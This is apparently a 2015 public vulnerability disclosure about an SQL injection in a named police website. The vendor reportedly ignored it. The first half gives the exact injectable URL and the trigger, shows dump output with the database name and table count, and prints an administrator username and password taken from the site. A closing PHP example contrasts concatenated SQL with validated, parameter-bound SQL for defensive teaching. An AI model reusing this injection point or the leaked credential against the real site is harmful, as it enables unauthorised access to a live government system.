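2015-09-03: Details reported to the vendor; awaiting vendor handling.
2015-09-08: The vendor has actively ignored the vulnerability; details disclosed to the public.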
RT!
Injection point:
http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21
Appending a * is enough to trigger an error; the value is carried into the statement.
http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21*
Database and administrator privileges:
current database: 'ycpolice'
[15:24:29] [INFO] resumed: yin_yanhuo
Database: ycpolice
[54 tables]
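Time-based injection is very slow... so I only dumped the main ones!
Got the administrator usernames and passwords. Dumping this took almost 2 hours; there is a lot more, but I am not going to dump it.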
It ran too slowly, so I only listed the first few, among them admin/dc6915681. That's it for now.
Filter special characters!
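The fix suggested above, taken one step further, as an added example that is not the site's code: the Class_ID path segment is accepted only if it is all digits and is then bound as an integer parameter, next to the concatenating pattern that lets 21* reach the database. The table, columns and function names are hypothetical, and an in-memory SQLite database stands in for the real backend.

```php
<?php
declare(strict_types=1);
// Constructed in-memory stand-in for the site's list table (all names are hypothetical).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, class_id INTEGER, title TEXT)');
$db->exec("INSERT INTO news (class_id, title) VALUES (21, 'Notice A'), (21, 'Notice B'), (7, 'Other')");

// Pull the value that follows /Class_ID/ out of a PATH_INFO style URL path.
function classIdSegment(string $path): ?string
{
    $parts = explode('/', trim($path, '/'));
    $i = array_search('Class_ID', $parts, true);
    return ($i === false || !isset($parts[$i + 1])) ? null : rawurldecode($parts[$i + 1]);
}

// Vulnerable pattern: the raw segment is concatenated into the SQL text.
function showlistUnsafe(PDO $db, string $path): array
{
    $sql = 'SELECT title FROM news WHERE class_id = ' . classIdSegment($path);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: accept only a short run of digits, then bind the value as an integer.
function showlistSafe(PDO $db, string $path): array
{
    $raw = classIdSegment($path);
    if ($raw === null || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        throw new InvalidArgumentException('Class_ID must be a positive integer');
    }
    $stmt = $db->prepare('SELECT title FROM news WHERE class_id = :cid');
    $stmt->bindValue(':cid', (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

foreach (['/Index/showlist/Class_ID/21', '/Index/showlist/Class_ID/21*'] as $path) {
    try {
        $unsafe = count(showlistUnsafe($db, $path)) . ' rows';
    } catch (PDOException $e) {
        $unsafe = 'SQL error reached the database';
    }
    try {
        $safe = count(showlistSafe($db, $path)) . ' rows';
    } catch (InvalidArgumentException $e) {
        $safe = 'rejected before any SQL ran';
    }
    echo "$path\n  concatenated: $unsafe\n  validated + bound: $safe\n";
}
```

Character filtering on its own depends on the filter list being complete; binding the value keeps it out of the SQL text regardless of what characters it contains.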
Severity: No impact (ignored by vendor)
Ignored at: 2015-09-08 18:18
None yet